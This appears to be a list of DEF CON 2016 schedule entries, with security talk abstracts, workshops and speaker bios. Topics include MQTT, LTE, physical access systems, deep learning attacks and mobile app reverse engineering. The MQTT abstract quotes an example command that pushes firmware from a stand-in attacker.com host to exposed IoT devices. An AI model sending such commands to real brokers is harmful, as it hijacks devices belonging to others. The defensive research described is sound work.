We live in a golden age. We have numerous options for innovative and inexpensive software-defined radio, a myriad of embedded processors, a variety of powerful development environments, and plentiful and cheap general-purpose processors. Data ubiquity has revolutionized personal and professional communications. Everyone has a cell phone and digital communications have triumphed over all. Communications is a solved problem!
Well, hold the phone. While many frequency bands have plenty of hardware, software, and firmware choices, there are many exceptions. Amateur radio microwave bands are still dominated by bespoke rigs producing narrowband analog voice and CW. Activity is mainly during contests, with beacons holding down the spectral fort for the long months between events. We are working very hard to change this situation in a fundamentally positive way.
AMSAT's next generation of digital microwave satellites is moving firmly into the 5GHz/10GHz bands. This is where the bandwidth is at, this is where the current professional interest lies, and this is where we must become competent designers and more plentiful operators.
In order to operate, radios must exist. Buying inexpensive off-the-shelf equipment to work these new digital satellites is not an option for the microwave bands. We believe that we must provide solutions for radios for the satellite service, otherwise these satellites will simply not be used. These solutions must include instructions on how to build rigs from scratch, instructions on how to build up rigs from existing components and radio gear, and a quality manufactured solution that can also be used for emergency communications services.
The amateur satellite service alone may not justify the expense and effort required to design and build a new radio system. But, this is the age of software-defined radio. Since the selected waveforms for AMSAT digital satellites and the waveforms for terrestrial digital television are from the same family of standards, we have a wonderful opportunity to make a radio that will do both space and ground. This opens up both amateur terrestrial and amateur space markets.
But we're not done yet. If intelligently designed, this radio is also microwave band test equipment, providing yet another market. Phase 4 Ground exists to make this radio a reality. Come listen to what Phase 4 Ground Team has done so far to design this radio, and where we are going next!
Return to Index
DEFCON - Track One - Saturday - 11:00-11:59
Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker
Evan Booth Engineer
In May of 2015, it was estimated that a pod-based coffee maker could be found in nearly one in three American homes. Despite the continued popularity of these single-cup coffee conjurers at home as well as in the workplace, it has become clear that these devices are not impervious to mechanical and/or electrical failure. It was this intersection of extremely prevalent hardware and relatively short lifespan that prompted me to begin exploring the upper limits of what could be created by repurposing one of the most popular pod-based machines: the Keurig. In this session, we will walk through some real-world examples of ‘MacGyver’-style creative problem-solving, we'll go hands on (yes, pun intended) with stuff made from repurposed Keurigs, and finally, I'll reflect on lessons learned from looking for potential in things most people deem common and unremarkable.
Evan Booth loves to build stuff out of other stuff, and he tends to break things for curiosity's sake. Throughout 2013 and into 2014, in an effort to highlight hypocrisy and "security theater" brought about by the TSA, through a research project called "Terminal Cornucopia," Evan created an arsenal ranging from simple melee weapons to reloadable firearms to remotely-triggered incendiary suitcases, all solely comprised of items that anyone can purchase inside most airport terminals *after* the security checkpoint.
Given the right ingredients, a big cardboard box can be a time machine, spaceship, minecart, or a telephone booth that only calls people named "Steve" who live in the future.
Twitter: @evanbooth
Return to Index
CPV - Bronze 2 - Saturday - 11:00-11:30
Talk Title:
JWTs in a flash!
Speaker Name, Employer or position:
Evan Johnson (ejcx_) - Security Systems Engineer at CloudFlare
Abstract:
The new(ish) JOSE standard is growing rapidly in popularity. Many people are excited to adopt the new standard and use it to build interesting and new things with JWT! Let's get everyone up to speed on JWTs, talk about the dos and don'ts regarding JWTs, review some JWT uses, and use JWTs effectively.
Bio:
Evan Johnson is a security systems engineer at CloudFlare. He loves breaking things and can distinguish diet pepsi from diet coke by taste.
Social media links if provided:
@ejcx_
Return to Index
Wireless - Skyview 1 - Friday - 16:00-17:50
Balint Seeber
Bio
A software engineer by training, Balint "a bit too early" Seeber is a perpetual hacker, the Director of Vulnerability Research at Bastille Networks and the guy behind spench.net. His passion is Software Defined Radio, sharing secrets, and discovering all that can be decoded from the ether, as well as extracting interesting information from lesser-known data sources (sometimes with pliers and a blow torch) and visualizing them in novel ways, such as interpretive dance. When not receiving electromagnetic radiation, or praise from his Twitter followers, he likes to develop interactive web apps for presenting spatial data or the Wireless Village schedule. Originally from "Down Under", he moved out of the morlock caves in 2012 to pursue his love of SDR as the Applications Specialist and SDR Evangelist at Ettus Research. This bio was definitely not edited as punishment for releasing the Wireless Village schedule early on Twitter.
@spenchdotnet
Kickin' It Old Skool: SDR for Ye Olde Signals
Abstract
"Software Defined Radio is a wonderful tool for experimenting and decoding modern-day digital signals, but what about the pre-digital days? Transmitting audio using analog modulation techniques is still common (e.g. broadcast FM, AM, HAM bands, trunked radio networks), but what about more complex signals?
Terrestrial digital television (ATSC & DVB-T) has replaced the old NTSC/PAL/SECAM channels we were used to, but NTSC has made an interesting comeback in First Person Video links for drones (digital solutions are becoming more popular, but latency has to be kept very low). GNU Radio can be used to develop a prototype NTSC demodulator for viewing these FPV links. It's back to the old world of interlacing and the back porch! I'll describe how an NTSC signal is constructed, and interactively demonstrate how to build a simple flowgraph to display video frames. If you have an FPV system, please bring it along so we can capture another source!
Another analog signal still very much in use, which does not transmit your traditional idea of information, is RADAR. One type is Frequency Modulated Continuous Wave (FMCW). It is an intuitively simple waveform, and has some great properties for seeing what's out there (for example, it is all over the HF band). GNU Radio can be used to synthesise and process FMCW signals. I'll show why FMCW works, demonstrate signal processing with offline tools, and construct some simple flowgraphs to do it in real time with GNU Radio.
If there's time, I'll preview some other SDR experiments, such as a decoder for the downlink path of the INMARSAT Aero aviation satellite service, and a spot jammer."
Return to Index
Demolabs - Table 1 - Saturday - 10:00-11:50
LAMMA (beta)
Ajit Hatti
LAMMA Framework (beta) aims to be a comprehensive suite for vulnerability assessment and auditing of crypto, PKI and related implementations.
Written in Python, LAMMA is an extensible framework and supports automated assessments at large scale. LAMMA has 4 different modules to cover the major aspects of crypto implementations:
REMOTE Module: Tests a server's TLS/SSL configuration and public certificate. It checks for all known vulnerabilities, from CRIME and BEAST to OFF-by-20, and it has unique checks like certificate timeline analysis and detection of weak moduli.
CRYPTO Module: Checks the various crypto primitives, right from random numbers, private keys and hashes generated by any underlying framework (like OpenSSL, Java keytool, etc.), for quality, backdooring and sanity.
TRUST Module: Checks certificates in the trust stores of TPM, browsers and apps to find any pinned, untrusted certificates like "Superfish". It also looks for stolen, insecurely stored private keys to avoid the spreading of Mask-APT-like malware.
SOURCE Module: Helps to enforce the "Cryptography Review Board" recommendations of your organisation. It uncovers the use of weak/backdoored schemes like "Dual_EC_DRBG" in Juniper's case.
The best thing about LAMMA is that it is a command-line and completely open source tool.
Ajit Hatti is a founder of "SECURITY MONX" and author of the LAMMA project, an open source initiative to improve the security of crypto implementations and to better consume cyber threat intelligence, which is also his primary area of research.
Currently Ajit is Principal Consultant (Cryptography & System Security) with Payatu Technologies. He has worked as a Security Researcher with Symantec, Emerson, IBM and Bluelane Technologies in the past, and has presented his research at Black Hat, DEF CON CPV and Nullcon.
Ajit is also a co-founder of the "null Open Security Community", a hardcore volunteer and contributor through the community efforts of null, Nullcon, SecurityTube.net and BSidesLV. Ajit is also a marathon runner and organizes "World Run By Hackers" during these conferences.
Return to Index
CPV - Bronze 2 - Friday - 14:00-15:00
Talk Title:
Lessons from the Hacking of Ashley Madison
Speaker Name, Employer or position:
Per Thorsheim - Founder at PasswordsCon
Abstract:
Ashley Madison, the dating site promoting adultery in its slogan "Life is short. Have an affair.", got hacked in July 2015. Millions of customers' most intimate details were released in August 2015 by the hackers, after the service owners refused to close down the business. As the biggest public breach of sensitive personal information ever, there are many lessons to be learned in terms of data protection, hacktivism, crisis management, media handling, and pitfalls that must be avoided. All this told from a very personal perspective, and with a background story showing the real value of good security & privacy for all.
Bio:
Per Thorsheim is the founder of PasswordsCon. Among other things, he revealed that LinkedIn was hacked in 2012, confirmed the Ashley Madison leaks in 2015, and played a role in making the major webmail providers implement RFC 3207 STARTTLS support to better protect your privacy. He does training for news reporters on digital security & privacy, source protection and reader/customer privacy.
Social media links if provided:
@thorsheim
Return to Index
DEFCON - Track Two - Sunday - 12:00-12:59
Let’s Get Physical: Network Attacks Against Physical Security Systems
Ricky ‘HeadlessZeke’ Lawshae, Hacker
With the rise of the Internet of Things, the line between the physical and the digital is growing ever more hazy. Devices that once only existed in the tangible world are now accessible by anyone with a network connection. Even physical security systems, a significant part of any large organization’s overall security posture, are being given network interfaces to make management and access more convenient. But that convenience also significantly increases the risk of attack, and hacks that were once thought to only exist in movies, like opening a building’s doors from a laptop or modifying a camera feed live, are now possible and even easy to pull off. In this talk, we will discuss this new attack surface and demonstrate various ways an attacker can circumvent and compromise devices such as door controllers, security cameras, and motion sensors over the network, as well as ways to protect yourself from such attacks.
Ricky ‘HeadlessZeke’ Lawshae has spent the better part of the last decade voiding warranties and annoying vendors for both business and pleasure. He has spoken at several conferences including DEF CON, Ruxcon, Recon, and Insomnihack on a variety of topics involving network protocols and embedded devices. By day, he works as a mild-mannered security researcher for TippingPoint DVLabs. By night, he roams the streets in search of justice.
Twitter: @HeadlessZeke
Return to Index
SkyTalks - Skyview 3 - Friday - 17:00-17:59
Speakers: Buckaroo, Steve Pordon
Talk: Lie To Me LIE TO THEM; Chronicles of How to save money at the Strip Club
What does your face and body language really say about you when you are doing physical social engineering? An understanding of micro expressions, macro expressions, body language and how to use them to your advantage in physical social engineering.
Return to Index
DEFCON - Track Two - Saturday - 11:00-11:59
Light-Weight Protocol! Serious Equipment! Critical Implications!
Lucas Lundgren Senior Security Consultant, FortConsult (Part of NCC Group)
Neal Hindocha Principal Consultant, FortConsult (Part of NCC Group)
The presentation will begin by discussing the protocol (http://mqtt.org/) and results from a simple query on shodan, showing the number of servers directly available on the internet. We will then go through the protocol specifications which shows that security is more or less non-existent. We are able to directly connect to many of the servers which are open to the internet, and following protocol specifications, see what devices they are communicating with.
We will show how its possible to extract data on all subscriptions available on the server using a ruby script, which basically gives a detailed list of the devices. However, it is not only the list of devices we are getting. The data returned by our script also contains things like session tokens (for web pages), social security numbers, phone numbers, names and other sensitive data used for one purpose or another in the communication to and from the devices.
We will show how messages can be posted into the message queues and in turn received by the devices that subscribe to the various queues. This means that we are able to issue commands targeting the range of devices we have discovered, that use this protocol. We have however also discovered that this is not limited to messages and commands, if supported by the device, we can actually issue firmware updated, simply by sending something similar to "FIRMWAREUPDATEHERE:http://www.attacker.com/filename.bin".
A specific example of what we can see and do is a home automation system we discovered. We got a list of every sensor and its status. Furthermore, we got exact GPS coordinates from the mobile app used to control the home automation. So in this case, not only were we able to control the system, we even knew when the owner was away.
The talk will move on to show various implementations where web clients and SQL servers are hooked in. Much of the communication data is stored in various databases, and because we have access, we can use MQTT to attack the database and web servers.
Multiple tools have been developed by us already to support testing the protocol and fuzzing endpoints. We will show the tools used in various demos and release them at the end of the talk! These tools are currently scripts containing various protocol implementations that can be used to target servers and extract, or inject, data. We also have a small client that implements all interesting areas of the protocol, which we use for server-to-client testing.
We believe this talk is going to have a significant impact on MQTT and anyone who uses it. This is an old protocol from 1999. It's fast and reliable, but it's missing security.
We also believe this talk will trigger a discussion about light-weight IoT protocols and security, which is much needed at this point in time.
Lucas Lundgren has vast experience in IT security, with the "bad luck" (or tendency) to annoy companies by reporting vulnerabilities in their products.
Lucas started breaking things at the age of twelve, and has reported numerous vulnerabilities in various products.
Having worked with penetration testing professionally for over 12 years, Lucas has held IT Security positions within companies such as Sony Ericsson and IOActive. He has also been part of Corelan Team before moving on to FortConsult (Part of NCC Group).
Lucas has been breaking everything from OS vendors to financials, and he has spent a considerable amount of time inside "impenetrable fortresses".
Lucas is primarily focusing on penetration testing as well as fuzzing and exploit development, no matter the platform or medium, where he also has a passion for IoT and Smart Technology.
Neal Hindocha has been working in the security industry since 1999. He began his work at Symantec, reverse engineering malware and writing signatures for Symantec's antivirus products. From there, he moved on to penetration testing, and has since been a consultant for Verizon Business and Trustwave, where he helped build the mobile testing services and focused on deliveries for advanced projects.
Currently, Neal is a Principal Consultant at FortConsult (part of NCC Group), focusing on new service areas such as cloud and IoT, whilst still reversing the odd malware and delivering pentests.
Return to Index
IOT - Bronze 4 - Friday - 17:00-18:50
Live Drone RF Reverse Engineering
Marc Newlin, Bastille Networks, Security Researcher
Reverse engineering wireless protocols is not as difficult as you might think! Join us and collaborate as we reverse engineer the RF protocol used by an AirHogs drone, from start to finish. You are invited to bring your own gear and follow along, or sit back and enjoy the spectacle.
What to Expect
We will start with some basic RF fundamentals and introduce the tools we will be using.
Next, we will collect open source intelligence about the drone from Google and the FCC website.
Armed with our OSINT, an SDR, and GNU Radio, we will reverse engineer the packet format and protocol used by the drone.
Using an SDR, we will implement a transceiver capable of communicating with the drone.
Bringing it all together, we will go airborne (with a killswitch ready should the proverbial shit hit the fan).
What to Bring
If you want to get some hands on RF reverse engineering experience, we encourage you to bring a laptop running GNU Radio, your 2.4GHz capable software defined radio, and an AirHogs Fury Jump Jet!
Marc is a security researcher at Bastille Networks, where he focuses on RF/IoT threats present in enterprise environments. He has been hacking on software defined radios since 2013, when he competed as a finalist in the DARPA Spectrum Challenge. In 2011, he wrote software to reassemble shredded documents for the DARPA Shredder Challenge, finishing the competition in third place out of 9000 teams.
Matt Knight is a software engineer and security researcher with Bastille Networks, where he seeks to discover vulnerabilities in the ubiquitous wireless interfaces that connect embedded devices to the Internet of Things.
Return to Index
WOS - Skyview 6 - Sunday - 12:10-12:59
LTE and Its Collective Insecurity
Chuck McAuley, Security Researcher at Ixia Communications
Chris Moore, Engineer at Ixia Communications
The world of LTE is enshrouded in acronym soup, mystery, and technical documents that implement security by obscurity. In this talk, we will shed light on the magic that is the evolved packet core, otherwise known as the EPC. The EPC is the packet routing engine that connects the tower to the Internet. We will discuss the network communication protocols, core infrastructure elements, and basic architecture of this system. In closing, we will disclose successful crashes and kills that we have had in this network and discuss the potential for large scale communication disruption.
Chuck McAuley is a Principal Security Researcher at Ixia Communications. For the last ten years Chuck has been doing performance and security testing of inline networking devices. If it passes packets and does deep packet inspection, he's probably tested it. In his spare time he stares at Wireshark trying to decipher the tea leaves.
Chris Moore is an SE Dev Manager for a network test company. He was an SE for around a decade before this, breaking, dissecting, and exposing every sort of network box under the guise of performance and security testing.
Return to Index
DEFCON - DEF CON 101 - Thursday - 10:00-10:59
Machine Duping 101: Pwning Deep Learning Systems
Clarence Chio ML Hacker
Deep learning and neural networks have gained incredible popularity in recent years. The technology has grown to be the most talked-about and least well-understood branch of machine learning. Aside from its highly publicized victories in playing Go, numerous successful applications of deep learning in image and speech recognition have kickstarted movements to integrate it into critical fields like medical imaging and self-driving cars. In the security field, deep learning has shown good experimental results in malware/anomaly detection, APT protection, spam/phishing detection, and traffic identification. This DEF CON 101 session will guide the audience through the theory and motivations behind deep learning systems. We look at the simplest form of neural networks, then explore how variations such as convolutional neural networks and recurrent neural networks can be used to solve real problems with an unreasonable effectiveness. Then, we demonstrate that most deep learning systems are not designed with security and resiliency in mind, and can be duped by any patient attacker with a good understanding of the system. The efficacy of applications using machine learning should not only be measured with precision and recall, but also by their malleability in an adversarial setting. After diving into popular deep learning software, we show how it can be tampered with to do what you want it to do, while avoiding detection by system administrators.
Besides giving a technical demonstration of deep learning and its inherent shortcomings in an adversarial setting, we will focus on tampering with real systems to show weaknesses in critical systems built with it. In particular, this demo-driven session will be focused on manipulating an image recognition system built with deep learning at the core, and exploring the difficulties in attacking systems in the wild. We will introduce a tool that helps deep learning hackers generate adversarial content for arbitrary machine learning systems, which can help make models more robust. By discussing defensive measures that should be put in place to prevent the class of attacks demonstrated, we hope to address the hype behind deep learning from the context of security, and look towards a more resilient future of the technology where developers can use it safely in critical deployments.
Clarence Chio graduated with a B.S. and M.S. in Computer Science from Stanford, specializing in data mining and artificial intelligence. He currently works as a Security Research Engineer at Shape Security, building a product that protects high-value web assets from automated attacks. At Shape, he works on the data analysis systems used to tackle this problem. Clarence spoke on Machine Learning and Security at PHDays, BSides Las Vegas and NYC, Code Blue, SecTor, and Hack in Paris. He has been a community speaker with Intel, and is also the founder and organizer of the ‘Data Mining for Cyber Security’ meetup group, the largest gathering of security data scientists in the San Francisco Bay Area.
Twitter: @cchio
Return to Index
DEFCON - DEF CON 101 - Thursday - 11:00-11:59
Maelstrom - Are You Playing with a Full Deck?: Using a Newly Developed Attack Life Cycle Game to Educate, Demonstrate and Evangelize.
Shane Steiger, Esq. CISSP, Chief Endpoint Security Architect
As a defender, have you ever been asked ‘do they win?’ How about ‘what products or capabilities should I buy to even the odds?’ Mapping the functionality to a standard list of desired capabilities only gets you so far. And, many vendors require an organization to pay for a framework, or for access to a framework, to enable tactical and strategic campaigns. Wouldn’t it be great to have an open source way to pick strategies? So what do you do? Build out your own defensive campaigns based on research, taxonomies and gamification. Building the attacker’s point of view is our expertise (at a CON). We have plenty of research here to talk about that point of view. How about building out the defender’s point of view based on the attacker’s life cycle? Defenders can use this as a defensive ‘complement’ to begin a legitimate defensive campaign. Maybe the defender could even ‘gamify’ the approach? An attacker’s approach, a defender’s approach and a progressive life cycle with a defender’s set of targets built on things we all know, love and hate: project management. I think we have a game!
Build out rules, much like real life, then bring on the attackers, bring on the defenders and play a little game to educate, demonstrate and evangelize. Watch strategies played by both attackers and defenders. Switch sides and learn to be a Purple Teamer! Digitize it and watch the game play people or even play itself; the true rise of the machine.
Wanna Play?!
Shane began his professional career with a large food manufacturer where he helped build and secure SCADA/ICS systems across 90+ food manufacturing plants in the US. From there he spent 6 years helping to develop and build the functionality of a security team for a large pharmaceutical distributor. Currently, he is the Chief Endpoint Security Architect for a Fortune 50 technology company. His interests reside in cyber resiliency techniques, internet of things, building/breaking things and muscle cars. To think, his 25+ year passion for all things geeky started with hacking the school library computer and getting detention. Shane is also a licensed attorney. Please don't hold this against him.
Return to Index
BHV - Skyview 4 - Saturday - 17:30-17:59
Speaker: NeuroTechX
@sciencelaer
@NeuroTechX
About Sydney Swaine-Simon:
Sydney Swaine-Simon was born and raised in Montreal, Canada. He has a strong passion for technology, innovation and the human mind, which led to him co-founding NeuroTechX, an NPO whose goal is to educate and grow the field of Neurotechnology.
About Melanie Segado:
Melanie really likes brains and computers. This is why she co-founded NeuroTechX, an NPO whose mission is to grow the global neurotechnology community. She is currently pursuing a PhD in cognitive neuroscience. Melanie spends her free time hacking on brain technology and thinking about its societal implications.
Abstract:
Brain scanning (EEG) and stimulating (TDCS) devices, which were initially used for clinical research, are now being used for a host of commercial and military applications. However, all of these applications can be DIY’d using commercially available parts.
This demo will focus on how you can implement two of the most cutting edge brain-related applications. The first is Brain Based Authentication, which is a way to use brain signals as a unique personal identifier. The second is TDCS, which is a way to modify brain function using electricity. Throughout the session we will discuss the neuroscience underlying these techniques, as well as their reliability and ethical ramifications.
Return to Index
DEFCON - DEF CON 101 - Friday - 17:00-17:59
Malware Command and Control Channels: A journey into darkness
Brad Woodberg Group Product Manager - Emerging Threats, Proofpoint, Inc.
Much of the time and attention dedicated to modern network security focuses on detecting the contemporary vulnerabilities and exploits which power the breaches that make the headlines. With almost all of the emphasis placed on the endless cycle of new entry points, we are often overlooking what is perhaps one of the most profoundly interesting aspects of modern network breaches: the post-exploit communication of a compromised system to the attacker—known as command and control.
Once malware has compromised an end system, the tables are turned against the attackers; we go from being on defense, to being on offense. Attackers are constantly evolving their techniques and have become incredibly creative in attempting to hide their tracks, maintain control of compromised systems, and exfiltrate sensitive data. This presentation will explore how command and control channels have evolved against traditional defenses, where they are today, future predictions on their evolution, and most importantly, how you can go on the offense to protect your organization by identifying and disrupting command and control channels in your network.
Brad Woodberg is a Group Product Manager at Proofpoint Inc, leading the Emerging Threats product line. Prior to his current role at Proofpoint, he spent six years at Juniper Networks as a layer 7 security product manager and product line engineer. Prior to Juniper he worked for a security consulting company in Ann Arbor Michigan for four years delivering a variety of network security technologies and services. He is a four-time published author of network security books through O’Reilly and Syngress. He has spoken at several security conferences including DEF CON 19, CanSecWest 2011, SEMAPHOR and other regional talks. Brad is also an active mentor to up and coming security engineers who share a similar interest and passion in all things network security.
Twitter: @bradmatic517
Return to Index
CPV - Bronze 2 - Sunday - 11:30-12:00
Talk Title:
Managing digital codesigning identities in an engineering company
Speaker Name, Employer or position:
Evgeny Sidorov, Eldar Zaitov
Abstract:
If your company develops mobile or desktop apps, you probably know that in the modern world they should be digitally signed. When you try to solve the problem of code signing in big environments, you'll face a lot of difficulties: signing key access management (especially in Continuous Integration), malware signing prevention and pitfalls like SHA-1 deprecation. We successfully implemented a custom CodeSigning-As-A-Service solution capable of signing executables running on Android, iOS, Windows (usermode code, kernel drivers, installation packages etc.), Java apps and applets, and solving all the mentioned problems.
Bio:
Evgeny Sidorov is an Information Security Officer at the major Russian search engine company Yandex. Evgeny works in the Application Security Engineering Team and is responsible for developing and embedding various defence techniques in web and mobile applications. He finished his Master's degree in applied mathematics at the Institute of Cryptography, Telecommunications and Computer Science of Moscow.
Formerly a software engineer, Eldar Zaitov switched to information security in 2010 and performed penetration testing for major Russian banks and companies. He was one of the initial members of the CTF team More Smoked Leet Chicken and participated in DEF CON CTF finals. In 2012 he joined the Application Security Engineering Team at Yandex. He has presented information security talks at ZeroNights and YaC. Eldar is a maintainer of CTFtime.org.
Return to Index
DEFCON - DEF CON 101 - Friday - 11:00-11:59
Meet the Feds
Jonathan Mayer Chief Technologist, Enforcement Bureau, Federal Communications Commission
Lorrie Cranor Chief Technologist, Federal Trade Commission
Ed Felten Deputy United States Chief Technology Officer, White House Office of Science and Technology Policy
The federal government is increasingly addressing policy issues that intersect with technology--especially security and privacy. This session explains how the government is responding, with technology leaders from the Federal Communications Commission, the Federal Trade Commission, and the White House Office of Science and Technology Policy. After an overview of recent policy initiatives, and an explanation of opportunities for public service, this session will consist of an extended Q&A. It's your opportunity to meet the feds and ask them anything.
Lorrie Cranor is Chief Technologist of the Federal Trade Commission. She joins the FTC from Carnegie Mellon University, where she is a Professor of Computer Science and Engineering and Public Policy, and where she directs the CyLab Usable Privacy and Security Laboratory. Lorrie was previously a researcher at AT&T Labs Research and has also taught at the Stern School of Business at New York University. She has authored over 150 research papers on online privacy and usable security, and has played a central role in establishing the usable privacy and security research community, including her founding of the Symposium on Usable Privacy and Security. She is also a co-director of Carnegie Mellon’s Privacy Engineering masters’ program. Lorrie holds a doctorate in Engineering and Policy, masters’ degrees in Computer Science, and Technology and Human Affairs, and a bachelor’s degree in Engineering and Public Policy, from Washington University in St. Louis, Missouri.
Twitter: @TechFTC
Edward W. Felten serves as Deputy United States Chief Technology Officer, within the White House Office of Science and Technology Policy. Ed comes to the White House from Princeton University, where he is the Robert E. Kahn Professor of Computer Science and Public Affairs and the founding Director of the Center for Information Technology Policy. Before rejoining the Princeton faculty, Ed served as the first Chief Technologist at the U.S. Federal Trade Commission, and worked with the U.S. Department of Justice Antitrust Division. Ed has published more than 100 papers and two books on technology law and policy. Ed is a member of the National Academy of Engineering and the American Academy of Arts and Sciences, and is a Fellow at the Association for Computing Machinery. He earned his bachelor’s degree in Physics with Honors from the California Institute of Technology and his master’s and doctoral degrees in Computer Science and Engineering from the University of Washington.
Twitter: @EdFelten44
Jonathan Mayer is Chief Technologist for the Federal Communications Commission Enforcement Bureau. His responsibilities include cybersecurity, consumer privacy, and network neutrality matters. Jonathan is also a Cybersecurity Fellow at Stanford University, where he is completing a PhD in Computer Science. He previously graduated from Stanford Law School, where he served as a lecturer on technology security, privacy, and surveillance. He received his undergraduate degree from the Woodrow Wilson School of Public and International Affairs at Princeton University. Jonathan was named to the Forbes "30 Under 30" in 2014, for his contributions to technology security and privacy.
Return to Index
BHV - Skyview 4 - Saturday - 11:30-11:59
Speaker: Louis Auguste
About Louis:
Lou Auguste is an entrepreneur in residence at the NYU Tandon incubator, Future Labs. He is passionate about microscopes, global health and creating jobs. His company Alexapath is at the forefront of AI-based diagnostics and has collected awards from the ASME, Qualcomm, Singularity U, the Indian government, the British government and the US government.
Abstract:
Why can't microscopes diagnose disease? What if they could? For the past four years our team from NYU Tandon School of Engineering has been building an IoT system capable of turning a standard microscope into a digital imaging tool. And the goal is to connect every laboratory in the world into a global network.
We call our device the Auto Diagnostic Assistant, or ADA, in honor of Ada Lovelace, who likely died from undiagnosed cervical cancer. We think the biohacking village will enjoy learning about ADA because it is an extremely low cost microscope accessory capable of accomplishing the same tasks that were previously only able to be accomplished with whole slide imaging devices. Perfect for biohackers looking to save, share, study and analyse images of specimens from their microscope.
Our team is comprised of hardware engineers, software devs and machine learning computer scientists and our mission is to make diagnosis faster and easier. We have validated the accuracy of our mWSIs (mobile Whole Slide Images) with a pre-clinical study and presented our research as a poster at USCAP (United States and Canada Anatomical Pathology Conference). Additionally we published our original methods for creation of digital slides in the British Medical Journal (though the secret sauce has changed since then.)
The hardware prototype of ADA won an award for best hardware led social innovation from the ASME in 2015. Currently, we are launching our beta trial in India with the support of the US Department of State and the Indian Department of Science and Technology. We are actively looking for beta testers in the US as well and would be happy to provide one unit for free to a visitor or member of the biohacking village.
Return to Index
BHV - Skyview 4 - Sunday - 11:30-11:59
Speaker: Ken Belva
About Ken Belva:
Kenneth F. Belva has had a distinguished career in cyber security for almost 20 years. His many roles have included managing a financial services cyber security program audited by the State and Fed, finding 0-days in major software, getting a US Patent on automated XSS exploitation techniques, as well as frequently speaking at many cyber security groups in NYC. He can be found on LinkedIn and on Twitter at @infosecmaverick.
Abstract:
PACS (picture archiving and communication system) is used in health care to store, retrieve, manage, distribute and present medical images. Such images are classified as PII as they are confidential patient data, usually x-rays along with a physician's patient notes. This talk will illustrate vulnerabilities in a PACS system. Note: potential surprises.
Return to Index
Demolabs - Table 4 - Saturday - 10:00-11:50
minimega
David Fritz
John Floren
minimega is a tool for setting up large networks of virtual machines. It simplifies the process of specifying & launching VMs, connecting them to networks, and managing the virtual machines as your experiment progresses. Emulate a full corporate network complete with Windows infrastructure, or replicate a portion of the Internet, including the backbone itself. minimega is faster and easier than OpenStack and requires essentially no configuration to set up. It can even self-deploy itself across a cluster to expand your experiment.
David Fritz and John Floren are researchers at Sandia National Laboratories. Their work in Emulytics focuses on new ways to emulate real-world computing environments in controlled ways for experiments in cyber security.
Return to Index
WOS - Skyview 6 - Saturday - 17:10-17:59
Mining VirusTotal for Operational Data and Applying a Quality Control On It
Gita Ziabari, Senior Threat Research Engineer at Fidelis Cybersecurity
More than one million samples are submitted and analyzed by more than 50 AV engines in VirusTotal on a daily basis. Factors such as filtering, scaling the detecting engines, scaling the categories in network data, and scaling the HTTP responses are used in conjunction with an algorithm for constructing operational data. The filtered data are clustered based on their malware type, with an indication of their malware names. The obtained data is also evaluated by another algorithm that removes aged and less scaled data on a daily basis. The APIs, algorithms and source code used will be presented to the audience. The tool can be downloaded for immediate use.
Gita Ziabari (Twitter: @gitaziabri) is working at Fidelis Cybersecurity as a Senior Threat Research Engineer. She has more than 12 years of experience in threat research, networking, testing and building automated frameworks.
Return to Index
Workshops - Las Vegas Ballroom 1 - Friday - 10:00-14:00
Mobile App Attack : Taming the evil app!
Sneha Rajguru Security Consultant, Payatu Technologies Pvt.Ltd.
This full-fledged hands-on workshop will get the attendees familiar with the various Android as well as iOS application analysis techniques and with bypassing the existing security models in both platforms. The main objective of this workshop is to provide a proper guide on how mobile applications can be attacked, provide an overview of how some of the most important security checks for the applications are applied, and give an in-depth understanding of these security checks. The workshop will also include a CTF challenge designed by the trainer at the end, where the attendees will use the skills learnt during the workshop to solve this challenge.
This workshop will mainly focus on the following :
- Reverse engineer Dex code for security analysis.
- Jailbreaking/rooting of the device, and various techniques to detect jailbreak/root.
- Runtime analysis of the apps by active debugging.
- Modifying parts of the code (any part, such as particular functions or classes) and detecting such modification: we will learn how to find and calculate the checksum of the code. Our objective in this section will be to learn how to reverse engineer an application, get its executable binaries, modify these binaries accordingly, and re-sign the application.
- Runtime modification of code. The objective is to learn how programs/code can be changed or modified at runtime. We will learn how to perform introspection or override the default behavior of methods during runtime, and then how to identify whether the methods have been changed. For iOS we can make use of tools such as Cycript, snoop-it, etc.
- Hooking an application and learning to perform program/code modification.
- By the end of the workshop, CTF challenges written by the trainer and based on the course content will be launched, where the attendees will use the skills learnt in the workshop to solve them.
The workshop will begin with a quick understanding of the architecture, file system, permissions and security model of both the iOS and Android platforms.
Sneha works as a Security Consultant with Payatu Technologies Pvt.Ltd. and holds C.E.H and E.C.S.A certifications. Her area of interest lies in web application and mobile application security and fuzzing. She has discovered various serious application flaws within open source applications such as PDFLite, Jobberbase, Lucidchart and more. She is also an active member of Null – The open security community in India, and a contributor to regular meetups at the Pune chapter. She has spoken and provided training at GNUnify, FUDCon, Defcamp #6 and Nullcon 2016.
Max Class Size: 25
Prerequisites for students: The participants are expected to have a basic knowledge of Mobile Operating Systems. Knowledge of programming languages (Java and C, and Python for scripting) will be an added advantage to grasp things quickly.
Materials or Equipment students will need to bring to participate: Students will need the following:
- Laptop with a minimum 4GB RAM and more than 20 GB Free Hard Disk Space
- Android device (>= 2.3) or iPhone/iPad (preferably rooted/jailbroken)
Laptops will need to meet the following software requirements:
- Windows 7/8, Mac OS X 10.5, or *Nix
- Administrative privileges on your machines
- Virtualbox or VMPlayer
- SSH Client
- Xcode 6 or higher
- ADB
- Android Studio 1.3 or higher
- Android SDK
Return to Index
DEFCON - DEF CON 101 - Sunday - 13:00-13:59
Mouse Jiggler Offense and Defense
Dr. Phil Professor, Bloomsburg University of Pennsylvania
A group of highly-armed individuals has just stormed into your office. They are looking to pull data from your computers which are protected with full disk encryption. In order to prevent your screen saver from activating they will likely immediately insert a mouse jiggler to prevent your screensaver lock from activating. This talk will present ways of detecting and defending against such assaults on your system by mouse jiggler wielding individuals. It will also show you how to build your own simple mouse jiggler. Nothing beyond basic Linux usage is required to understand this talk. Attendees will leave with several ways to defend against mouse jigglers and the knowledge of how to create their own mouse jigglers.
Phil was born at an early age. He cleaned out his savings as a boy in order to buy a TI99-4A computer for the sum of $450. Two years later he learned 6502 assembly and has been hacking computers and electronics ever since.
